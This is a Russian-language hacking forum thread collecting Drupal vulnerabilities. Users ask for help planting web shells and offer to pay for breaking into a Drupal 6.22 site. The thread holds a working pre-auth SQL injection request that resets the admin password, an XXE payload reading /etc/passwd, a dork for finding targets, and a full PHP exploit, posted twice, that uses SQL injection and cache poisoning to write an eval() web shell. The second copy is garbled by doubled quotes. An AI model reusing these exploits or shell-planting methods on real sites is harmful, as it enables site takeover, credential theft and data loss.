[ Обзор Уязвимостей .:Drupal :. ]

подскажите как залить шелл в вот эту версию Drupal 6.22
доступ админки есть
стандартные способы не помогли

 

CVE-2014-3704 Drupal 7.0 – 7.31 pre-auth SQL Injection Vulnerability

lol
https://www.sektioneins.de/en/advisories/advisory-012014-drupal-pre-auth-sql-injection-vulnerability.html

Code:

                        SektionEins GmbH
                        www.sektioneins.de

                     -= Security  Advisory =-

     Advisory: Drupal - pre-auth SQL Injection Vulnerability
 Release Date: 2014/10/15
Last Modified: 2014/10/15
       Author: Stefan Horst [stefan.horst[at]sektioneins.de]

  Application: Drupal >= 7.0 <= 7.31
     Severity: Full SQL injection, which results in total control and code execution of Website.
         Risk: Highly Critical
Vendor Status: Drupal 7.32 fixed this bug
    Reference: http://www.sektioneins.com/en/advisories/advisory-012014-drupal-pre-auth-sql-injection-vulnerability.html

Overview:

  Quote from http://www.drupal.org
  "Come for the software, stay for the community

   Drupal is an open source content management platform powering millions
   of websites and applications. It’s built, used, and supported by an
   active and diverse community of people around the world."

  During a code audit of Drupal extensions for a customer an SQL Injection
      was found in the way the Drupal core handles prepared statements.

  A malicious user can inject arbitrary SQL queries. And thereby
  control the complete Drupal site. This leads to a code execution as well.

      This vulnerability can be exploited by remote attackers without any
      kind of authentication required.

Details:

  Drupal uses prepared statements in all its SQL queries. To handle IN
  statements there is an expandArguments function to expand arrays.

    protected function expandArguments(&$query, &$args) {
      $modified = FALSE;

      // If the placeholder value to insert is an array, assume that we need
      // to expand it out into a comma-delimited set of placeholders.
      foreach (array_filter($args, 'is_array') as $key => $data) {
        $new_keys = array();
        foreach ($data as $i => $value) {
          // This assumes that there are no other placeholders that use the same
          // name.  For example, if the array placeholder is defined as :example
          // and there is already an :example_2 placeholder, this will generate
          // a duplicate key.  We do not account for that as the calling code
          // is already broken if that happens.
          $new_keys[$key . '_' . $i] = $value;
        }

        // Update the query with the new placeholders.
        // preg_replace is necessary to ensure the replacement does not affect
        // placeholders that start with the same exact text. For example, if the
        // query contains the placeholders :foo and :foobar, and :foo has an
        // array of values, using str_replace would affect both placeholders,
        // but using the following preg_replace would only affect :foo because
        // it is followed by a non-word character.
        $query = preg_replace('#' . $key . '\b#', implode(', ', array_keys($new_keys)), $query);

        // Update the args array with the new placeholders.
        unset($args[$key]);
        $args += $new_keys;

        $modified = TRUE;
      }

      return $modified;
    }

  The function assumes that it is called with an array which has no keys. Example:

    db_query("SELECT * FROM {users} where name IN (:name)", array(':name'=>array('user1','user2')));

  Which results in this SQL Statement

    SELECT * from users where name IN (:name_0, :name_1)

  with the parameters name_0 = user1 and name_1 = user2.

  The Problem occurs, if the array has keys, which are no integers. Example:

    db_query("SELECT * FROM {users} where name IN (:name)", array(':name'=>array('test -- ' => 'user1','test' => 'user2')));

  this results in an exploitable SQL query:

     SELECT * FROM users WHERE name = :name_test -- , :name_test AND status = 1

  with parameters :name_test = user2.

  Since Drupal uses PDO, multi-queries are allowed. So this SQL Injection can
      be used to insert arbitrary data in the database, dump or modify existing data
      or drop the whole database.

  With the possibility to INSERT arbitrary data into the database an
  attacker can execute any PHP code through Drupal features with callbacks.

Patch:

    $new_keys = array();
    foreach (array_values($data) as $i => $value) {
      // This assumes that there are no other placeholders that use the same
      // name.  For example, if the array placeholder is defined as :example
      // and there is already an :example_2 placeholder, this will generate
      // a duplicate key.  We do not account for that as the calling code
      // is already broken if that happens.
      $new_keys[$key . '_' . $i] = $value;
    }

Proof of Concept:

  SektionEins GmbH has developed a proof of concept, but was asked by
  Drupal to postpone the release.

Disclosure Timeline:

  16. Sep.  2014 - Notified the Drupal devs via security contact form
  15. Okt.  2014 - Relase of Bugfix by Drupal core Developers

poc:

Code:

name[0%20;update+users+set+name%3d'owned'+,+pass+%3d+'$S$DkIkdKLIvRK0iVHm99X7B/M8QC17E1Tp/kMOd1Ie8V/PgWjtAZld'+where+uid+%3d+'1';;#%20%20]=test3&name[0]=test&pass=shit2&test2=test&form_build_id=&form_id=user_login_block&op=Log+in

и работает ведь

вперед хэкеры
exploit:
http://pastebin.com/nDwLFV3v
video: http://www.youtube.com/watch?v=rHwJYD_yTlM

 

Drupal 7.34 Admin PHP Object Injection
https://websec.wordpress.com/2015/01/09/drupal-7-34-admin-php-object-injection/

 

Open redirect и обход авторизации. В плане эксплуатации имеются серьезные ограничения.
https://www.drupal.org/SA-CORE-2015-001

Байпас (modules/user/user.module)
До

PHP:

function user_pass_rehash($password, $timestamp, $login) {
  return md5($timestamp . $password . $login);
}

После

PHP:

function user_pass_rehash($password, $timestamp, $login, $uid) {
  // Backwards compatibility: Try to determine a $uid if one was not passed.
  // (Since $uid is a required parameter to this function, a PHP warning will
  // be generated if it's not provided, which is an indication that the calling
  // code should be updated. But the code below will try to generate a correct
  // hash in the meantime.)
  if (!isset($uid)) {
    $uids = array();
    $result = db_query_range("SELECT uid FROM {users} WHERE pass = '%s' AND login = '%s' AND uid > 0", $password, $login, 0, 2);
    while ($row = db_fetch_array($result)) {
      $uids[] = $row['uid'];
    }
    // If exactly one user account matches the provided password and login
    // timestamp, proceed with that $uid.
    if (count($uids) == 1) {
      $uid = reset($uids);
    }
    // Otherwise there is no safe hash to return, so return a random string
    // that will never be treated as a valid token.
    else {
      return drupal_random_key();
    }
  }
  return drupal_hmac_base64($timestamp . $login . $uid, drupal_get_private_key() . $password);
}


ORed (includes/bootstrap.inc)

PHP:

// Sanitize the destination parameter (which is often used for redirects)
      // to prevent open redirect attacks leading to other domains. Sanitize
      // both $_GET['destination'] and $_REQUEST['destination'] to protect code
      // that relies on either, but do not sanitize $_POST to avoid interfering
      // with unrelated form submissions. $_REQUEST['edit']['destination'] is
      // also sanitized since drupal_goto() will sometimes rely on it, and
      // other code might therefore use it too. The sanitization happens here
      // because menu_path_is_external() requires the variable system to be
      // available.
      if (isset($_GET['destination']) || isset($_REQUEST['destination']) || isset($_REQUEST['edit']['destination'])) {
        require_once './includes/menu.inc';
        drupal_load('module', 'filter');
        // If the destination is an external URL, remove it.
        if (isset($_GET['destination']) && menu_path_is_external($_GET['destination'])) {
          unset($_GET['destination']);
          unset($_REQUEST['destination']);
        }
        // If there's still something in $_REQUEST['destination'] that didn't
        // come from $_GET, check it too.
        if (isset($_REQUEST['destination']) && (!isset($_GET['destination']) || $_REQUEST['destination'] != $_GET['destination']) && menu_path_is_external($_REQUEST['destination'])) {
          unset($_REQUEST['destination']);
        }
        // Check $_REQUEST['edit']['destination'] separately.
        if (isset($_REQUEST['edit']['destination']) && menu_path_is_external($_REQUEST['edit']['destination'])) {
          unset($_REQUEST['edit']['destination']);
        }
      }

 

Pre-auth XXE in Drupal Services module, neat tricks to bypass restrictions inside
Подробное описание (PDF): http://www.synacktiv.fr/ressources/synacktiv_drupal_xxe_services.pdf

Code:

POST /drupal7.28/?q=test/node HTTP/1.1
[...]
<!DOCTYPE root [
<!ENTITY % evil SYSTEM "file:///etc/passwd">
%evil;
]>
<xml>
        <test>test</test>
</xml>

ДОРК: "inurl:sites/all/modules/services/servers/rest_server/"

 

Кто подскажет насчет 7,37 версии? может у когото есть сплоит?

 

6.36 есть чем ковырнуть ?

 

Всем привет
drupal 6.20. Аккаунт с правами администратора
Стандартные способы заливки шелла не помогают Кто что ещё подскажет?Что пробовала
1) В модулях включила PHP filter
2) По site/admin/settings/filters/ => Access denied You are not authorized to access this page.
А значит, уже не получится включить формат php, и соответственно при добавлении блоков или страниц нельзя выбрать формат php... Этот способ облом
3) Темы загружать не могу
4) есть imce. Загружаю php => переименовывается в php_.txt. Загружаю .php3 => скачивается
Загружаю .shtml - нормально открывается, но видна только html'ная часть, php код не исполняется, всё интерпретируется как html.
5) пыталась загрузить опять же через imce .htaccess чтобы не скачивались файлы php3. Но облом, переименовывается в htaccess.

В общем, не знаю, что ещё делать

Кто что подскажет?

 

DRUPAL 7.X SERVICES MODULE UNSERIALIZE() TO RCE

Уязвимость
Одной из особенностей модуля является то, что можно управлять форматом ввода / вывода, изменяя заголовки Content-Type / Accept. По умолчанию разрешены следующие форматы ввода:

Application / xml
Application / json
Multipart / form-data
Application / vnd.php.serialized

Code:

POST /drupal-7.54/my_rest_endpoint/user/login HTTP/1.1
Host: vmweb.lan
Accept: application/json
Content-Type: application/vnd.php.serialized
Content-Length: 45
Connection: close

a:2:{s:8:"username";s:5:"admin";s:8:"password";s:8:"password";}

Code:

HTTP/1.1 200 OK
Date: Thu, 02 Mar 2017 14:29:54 GMT
Server: Apache/2.4.18 (Ubuntu)
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
X-Content-Type-Options: nosniff
Vary: Accept
Set-Cookie: SESSaad41d4de9fd30ccb65f8ea9e4162d52=ufBRP7UJFuQKSf0VuFvwaoB3h4mjVYXbE9K6Y_DGU_I; expires=Sat, 25-Mar-2017 18:03:14 GMT; Max-Age=2000000; path=/; domain=.vmweb.lan; HttpOnly
Content-Length: 635
Connection: close
Content-Type: application/json

{"sessid":"ufBRP7UJFuQKSf0VuFvwaoB3h4mjVYXbE9K6Y_DGU_I","session_name":"SESSaad41d4de9fd30ccb65f8ea9e4162d52","token":"2tFysvDt1POl7jjJJSCRO7sL1rvlrnqtrik6gljggo4","user":{"uid":"1","name":"admin","mail":"[email protected]","theme":"","signature":"","signature_format":null,"created":"1487348324","access":"1488464867","login":1488464994,"status":"1","timezone":"Europe/Berlin","language":"","picture":null,"init":"[email protected]","data":false,"roles":{"2":"authenticated user","3":"administrator"},"rdf_mapping":{"rdftype":["sioc:UserAccount"],"name":{"predicates":["foaf:name"]},"homepage":{"predicates":["foaf:page"],"type":"rel"}}}}

Exploit:

PHP:

#!/usr/bin/php
<?php
# Drupal Services Module Remote Code Execution Exploit
# https://www.ambionics.io/blog/drupal-services-module-rce
# cf
#
# Three stages:
# 1. Use the SQL Injection to get the contents of the cache for current endpoint
#    along with admin credentials and hash
# 2. Alter the cache to allow us to write a file and do so
# 3. Restore the cache
#

# Initialization

error_reporting(E_ALL);

define('QID', 'anything');
define('TYPE_PHP', 'application/vnd.php.serialized');
define('TYPE_JSON', 'application/json');
define('CONTROLLER', 'user');
define('ACTION', 'login');

$url = 'http://vmweb.lan/drupal-7.54';
$endpoint_path = '/rest_endpoint';
$endpoint = 'rest_endpoint';

$file = [
    'filename' => 'dixuSOspsOUU.php',
    'data' => '<?php eval(file_get_contents(\'php://input\')); ?>'
];

$browser = new Browser($url . $endpoint_path);


# Stage 1: SQL Injection

class DatabaseCondition
{
    protected $conditions = [
        "#conjunction" => "AND"
    ];
    protected $arguments = [];
    protected $changed = false;
    protected $queryPlaceholderIdentifier = null;
    public $stringVersion = null;

    public function __construct($stringVersion=null)
    {
        $this->stringVersion = $stringVersion;

        if(!isset($stringVersion))
        {
            $this->changed = true;
            $this->stringVersion = null;
        }
    }
}

class SelectQueryExtender {
    # Contains a DatabaseCondition object instead of a SelectQueryInterface
    # so that $query->compile() exists and (string) $query is controlled by us.
    protected $query = null;

    protected $uniqueIdentifier = QID;
    protected $connection;
    protected $placeholder = 0;

    public function __construct($sql)
    {
        $this->query = new DatabaseCondition($sql);
    }
}

$cache_id = "services:$endpoint:resources";
$sql_cache = "SELECT data FROM {cache} WHERE cid='$cache_id'";
$password_hash = '$S$D2NH.6IZNb1vbZEV1F0S9fqIz3A0Y1xueKznB8vWrMsnV/nrTpnd';

# Take first user but with a custom password
# Store the original password hash in signature_format, and endpoint cache
# in signature
$query =
    "0x3a) UNION SELECT ux.uid AS uid, " .
    "ux.name AS name, '$password_hash' AS pass, " .
    "ux.mail AS mail, ux.theme AS theme, ($sql_cache) AS signature, " .
    "ux.pass AS signature_format, ux.created AS created, " .
    "ux.access AS access, ux.login AS login, ux.status AS status, " .
    "ux.timezone AS timezone, ux.language AS language, ux.picture " .
    "AS picture, ux.init AS init, ux.data AS data FROM {users} ux " .
    "WHERE ux.uid<>(0"
;

$query = new SelectQueryExtender($query);
$data = ['username' => $query, 'password' => 'ouvreboite'];
$data = serialize($data);

$json = $browser->post(TYPE_PHP, $data);

# If this worked, the rest will as well
if(!isset($json->user))
{
    print_r($json);
    e("Failed to login with fake password");
}

# Store session and user data

$session = [
    'session_name' => $json->session_name,
    'session_id' => $json->sessid,
    'token' => $json->token
];
store('session', $session);

$user = $json->user;

# Unserialize the cached value
# Note: Drupal websites admins, this is your opportunity to fight back :)
$cache = unserialize($user->signature);

# Reassign fields
$user->pass = $user->signature_format;
unset($user->signature);
unset($user->signature_format);

store('user', $user);

if($cache === false)
{
    e("Unable to obtains endpoint's cache value");
}

x("Cache contains " . sizeof($cache) . " entries");

# Stage 2: Change endpoint's behaviour to write a shell

class DrupalCacheArray
{
    # Cache ID
    protected $cid = "services:endpoint_name:resources";
    # Name of the table to fetch data from.
    # Can also be used to SQL inject in DrupalDatabaseCache::getMultiple()
    protected $bin = 'cache';
    protected $keysToPersist = [];
    protected $storage = [];

    function __construct($storage, $endpoint, $controller, $action) {
        $settings = [
            'services' => ['resource_api_version' => '1.0']
        ];
        $this->cid = "services:$endpoint:resources";

        # If no endpoint is given, just reset the original values
        if(isset($controller))
        {
            $storage[$controller]['actions'][$action] = [
                'help' => 'Writes data to a file',
                # Callback function
                'callback' => 'file_put_contents',
                # This one does not accept "true" as Drupal does,
                # so we just go for a tautology
                'access callback' => 'is_string',
                'access arguments' => ['a string'],
                # Arguments given through POST
                'args' => [
                    0 => [
                        'name' => 'filename',
                        'type' => 'string',
                        'description' => 'Path to the file',
                        'source' => ['data' => 'filename'],
                        'optional' => false,
                    ],
                    1 => [
                        'name' => 'data',
                        'type' => 'string',
                        'description' => 'The data to write',
                        'source' => ['data' => 'data'],
                        'optional' => false,
                    ],
                ],
                'file' => [
                    'type' => 'inc',
                    'module' => 'services',
                    'name' => 'resources/user_resource',
                ],
                'endpoint' => $settings
            ];
            $storage[$controller]['endpoint']['actions'] += [
                $action => [
                    'enabled' => 1,
                    'settings' => $settings
                ]
            ];
        }

        $this->storage = $storage;
        $this->keysToPersist = array_fill_keys(array_keys($storage), true);
    }
}

class ThemeRegistry Extends DrupalCacheArray {
    protected $persistable;
    protected $completeRegistry;
}

cache_poison($endpoint, $cache);

# Write the file
$json = (array) $browser->post(TYPE_JSON, json_encode($file));


# Stage 3: Restore endpoint's behaviour

cache_reset($endpoint, $cache);

if(!(isset($json[0]) && $json[0] === strlen($file['data'])))
{
    e("Failed to write file.");
}

$file_url = $url . '/' . $file['filename'];
x("File written: $file_url");


# HTTP Browser

class Browser
{
    private $url;
    private $controller = CONTROLLER;
    private $action = ACTION;

    function __construct($url)
    {
        $this->url = $url;
    }

    function post($type, $data)
    {
        $headers = [
            "Accept: " . TYPE_JSON,
            "Content-Type: $type",
            "Content-Length: " . strlen($data)
        ];
        $url = $this->url . '/' . $this->controller . '/' . $this->action;

        $s = curl_init();
        curl_setopt($s, CURLOPT_URL, $url);
        curl_setopt($s, CURLOPT_HTTPHEADER, $headers);
        curl_setopt($s, CURLOPT_POST, 1);
        curl_setopt($s, CURLOPT_POSTFIELDS, $data);
        curl_setopt($s, CURLOPT_RETURNTRANSFER, true);
        curl_setopt($s, CURLOPT_SSL_VERIFYHOST, 0);
        curl_setopt($s, CURLOPT_SSL_VERIFYPEER, 0);
        $output = curl_exec($s);
        $error = curl_error($s);
        curl_close($s);

        if($error)
        {
            e("cURL: $error");
        }

        return json_decode($output);
    }
}

# Cache

function cache_poison($endpoint, $cache)
{
    $tr = new ThemeRegistry($cache, $endpoint, CONTROLLER, ACTION);
    cache_edit($tr);
}

function cache_reset($endpoint, $cache)
{
    $tr = new ThemeRegistry($cache, $endpoint, null, null);
    cache_edit($tr);
}

function cache_edit($tr)
{
    global $browser;
    $data = serialize([$tr]);
    $json = $browser->post(TYPE_PHP, $data);
}

# Utils

function x($message)
{
    print("$message\n");
}

function e($message)
{
    x($message);
    exit(1);
}

function store($name, $data)
{
    $filename = "$name.json";
    file_put_contents($filename, json_encode($data, JSON_PRETTY_PRINT));
    x("Stored $name information in $filename");
}

Всем срочно обновляться =)


Источник : Здесь

 

Drupal 7.x Services Module Remote Code Execution

Code:

#!/usr/bin/php

<?php
# Drupal Services Module Remote Code Execution Exploit
# https://www.ambionics.io/blog/drupal-services-module-rce
# cf
#
# Three stages:
# 1. Use the SQL Injection to get the contents of the cache for current
endpoint
#    along with admin credentials and hash
# 2. Alter the cache to allow us to write a file and do so
# 3. Restore the cache
#
# Initialization
error_reporting(E_ALL);
define(''QID'', ''anything'');
define(''TYPE_PHP'', ''application/vnd.php.serialized'');
define(''TYPE_JSON'', ''application/json'');
define(''CONTROLLER'', ''user'');
define(''ACTION'', ''login'');
$url = ''http://vmweb.lan/drupal-7.54'';
$endpoint_path = ''/rest_endpoint'';
$endpoint = ''rest_endpoint'';
$file = [
    ''filename'' => ''dixuSOspsOUU.php'',
    ''data'' => ''<?php eval(file_get_contents(\''php://input\'')); ?>''
];
$browser = new Browser($url . $endpoint_path);
# Stage 1: SQL Injection
class DatabaseCondition
{
    protected $conditions = [
        "#conjunction" => "AND"
    ];
    protected $arguments = [];
    protected $changed = false;
    protected $queryPlaceholderIdentifier = null;
    public $stringVersion = null;
    public function __construct($stringVersion=null)
    {
        $this->stringVersion = $stringVersion;
        if(!isset($stringVersion))
        {
            $this->changed = true;
            $this->stringVersion = null;
        }
    }
}
class SelectQueryExtender {
    # Contains a DatabaseCondition object instead of a SelectQueryInterface
    # so that $query->compile() exists and (string) $query is controlled by
us.
    protected $query = null;
    protected $uniqueIdentifier = QID;
    protected $connection;
    protected $placeholder = 0;
    public function __construct($sql)
    {
        $this->query = new DatabaseCondition($sql);
    }
}
$cache_id = "services:$endpoint:resources";
$sql_cache = "SELECT data FROM {cache} WHERE cid=''$cache_id''";
$password_hash = ''$S$D2NH.6IZNb1vbZEV1F0S9fqIz3A0Y1xueKznB8vWrMsnV/nrTpnd'';
# Take first user but with a custom password
# Store the original password hash in signature_format, and endpoint cache
# in signature
$query =
    "0x3a) UNION SELECT ux.uid AS uid, " .
    "ux.name AS name, ''$password_hash'' AS pass, " .
    "ux.mail AS mail, ux.theme AS theme, ($sql_cache) AS signature, " .
    "ux.pass AS signature_format, ux.created AS created, " .
    "ux.access AS access, ux.login AS login, ux.status AS status, " .
    "ux.timezone AS timezone, ux.language AS language, ux.picture " .
    "AS picture, ux.init AS init, ux.data AS data FROM {users} ux " .
    "WHERE ux.uid<>(0"
;
$query = new SelectQueryExtender($query);
$data = [''username'' => $query, ''password'' => ''ouvreboite''];
$data = serialize($data);
$json = $browser->post(TYPE_PHP, $data);
# If this worked, the rest will as well
if(!isset($json->user))
{
    print_r($json);
    e("Failed to login with fake password");
}
# Store session and user data
$session = [
    ''session_name'' => $json->session_name,
    ''session_id'' => $json->sessid,
    ''token'' => $json->token
];
store(''session'', $session);
$user = $json->user;
# Unserialize the cached value
# Note: Drupal websites admins, this is your opportunity to fight back :)
$cache = unserialize($user->signature);
# Reassign fields
$user->pass = $user->signature_format;
unset($user->signature);
unset($user->signature_format);
store(''user'', $user);
if($cache === false)
{
    e("Unable to obtains endpoint''s cache value");
}
x("Cache contains " . sizeof($cache) . " entries");
# Stage 2: Change endpoint''s behaviour to write a shell
class DrupalCacheArray
{
    # Cache ID
    protected $cid = "services:endpoint_name:resources";
    # Name of the table to fetch data from.
    # Can also be used to SQL inject in DrupalDatabaseCache::getMultiple()
    protected $bin = ''cache'';
    protected $keysToPersist = [];
    protected $storage = [];
    function __construct($storage, $endpoint, $controller, $action) {
        $settings = [
            ''services'' => [''resource_api_version'' => ''1.0'']
        ];
        $this->cid = "services:$endpoint:resources";
        # If no endpoint is given, just reset the original values
        if(isset($controller))
        {
            $storage[$controller][''actions''][$action] = [
                ''help'' => ''Writes data to a file'',
                # Callback function
                ''callback'' => ''file_put_contents'',
                # This one does not accept "true" as Drupal does,
                # so we just go for a tautology
                ''access callback'' => ''is_string'',
                ''access arguments'' => [''a string''],
                # Arguments given through POST
                ''args'' => [
                    0 => [
                        ''name'' => ''filename'',
                        ''type'' => ''string'',
                        ''description'' => ''Path to the file'',
                        ''source'' => [''data'' => ''filename''],
                        ''optional'' => false,
                    ],
                    1 => [
                        ''name'' => ''data'',
                        ''type'' => ''string'',
                        ''description'' => ''The data to write'',
                        ''source'' => [''data'' => ''data''],
                        ''optional'' => false,
                    ],
                ],
                ''file'' => [
                    ''type'' => ''inc'',
                    ''module'' => ''services'',
                    ''name'' => ''resources/user_resource'',
                ],
                ''endpoint'' => $settings
            ];
            $storage[$controller][''endpoint''][''actions''] += [
                $action => [
                    ''enabled'' => 1,
                    ''settings'' => $settings
                ]
            ];
        }
        $this->storage = $storage;
        $this->keysToPersist = array_fill_keys(array_keys($storage), true);
    }
}
class ThemeRegistry Extends DrupalCacheArray {
    protected $persistable;
    protected $completeRegistry;
}
cache_poison($endpoint, $cache);
# Write the file
$json = (array) $browser->post(TYPE_JSON, json_encode($file));
# Stage 3: Restore endpoint''s behaviour
cache_reset($endpoint, $cache);
if(!(isset($json[0]) && $json[0] === strlen($file[''data''])))
{
    e("Failed to write file.");
}
$file_url = $url . ''/'' . $file[''filename''];
x("File written: $file_url");
# HTTP Browser
class Browser
{
    private $url;
    private $controller = CONTROLLER;
    private $action = ACTION;
    function __construct($url)
    {
        $this->url = $url;
    }
    function post($type, $data)
    {
        $headers = [
            "Accept: " . TYPE_JSON,
            "Content-Type: $type",
            "Content-Length: " . strlen($data)
        ];
        $url = $this->url . ''/'' . $this->controller . ''/'' . $this->action;
        $s = curl_init();
        curl_setopt($s, CURLOPT_URL, $url);
        curl_setopt($s, CURLOPT_HTTPHEADER, $headers);
        curl_setopt($s, CURLOPT_POST, 1);
        curl_setopt($s, CURLOPT_POSTFIELDS, $data);
        curl_setopt($s, CURLOPT_RETURNTRANSFER, true);
        curl_setopt($s, CURLOPT_SSL_VERIFYHOST, 0);
        curl_setopt($s, CURLOPT_SSL_VERIFYPEER, 0);
        $output = curl_exec($s);
        $error = curl_error($s);
        curl_close($s);
        if($error)
        {
            e("cURL: $error");
        }
        return json_decode($output);
    }
}
# Cache
function cache_poison($endpoint, $cache)
{
    $tr = new ThemeRegistry($cache, $endpoint, CONTROLLER, ACTION);
    cache_edit($tr);
}
function cache_reset($endpoint, $cache)
{
    $tr = new ThemeRegistry($cache, $endpoint, null, null);
    cache_edit($tr);
}
function cache_edit($tr)
{
    global $browser;
    $data = serialize([$tr]);
    $json = $browser->post(TYPE_PHP, $data);
}
# Utils
function x($message)
{
    print("$message\n");
}
function e($message)
{
    x($message);
    exit(1);
}
function store($name, $data)
{
    $filename = "$name.json";
    file_put_contents($filename, json_encode($data, JSON_PRETTY_PRINT));
    x("Stored $name information in $filename");
}

 

Зачем 2 одинаковых поста?

 

вечно ругается на эту строку "28" $file = [

 

может кто то с 6.22 помочь на возмездной основе?

 

[Quote = "leokomaro, de la publicación: 4079266, miembro de: 302606"] alguien puede ayudar con un 6,22 sobre una base reembolsable [/ quote]?
https://cxsecurity.com/issue/WLB-2016070020

alguien sabe otra vulnerabilidad a 6.22?

 

CVE-2016-3168 вот это кто нибудь может объяснить как использовать?

 

Пацаны,
Drupal 6.28, 2013-01-16
----------------------
- Fixed security issues (multiple vulnerabilities), see SA-CORE-2013-001.

реально ли это взломать?

 

Подскажите, возможен в друпале xmlrpc брут?
в wp все предельно просто, делаешь xml Запрос с параметрами и все работает, а какие параметры у друпала? информация в сети очень древняя.

Если это реально, можно пример?

 

Паблик экспа Drupalgeddon2 только при открытой реги отрабатывает?

 

Паблик экспа Drupalgeddon2 ни в каком случае не отрабатывает, защита от дурака стоит.

 

Спасибо, кэп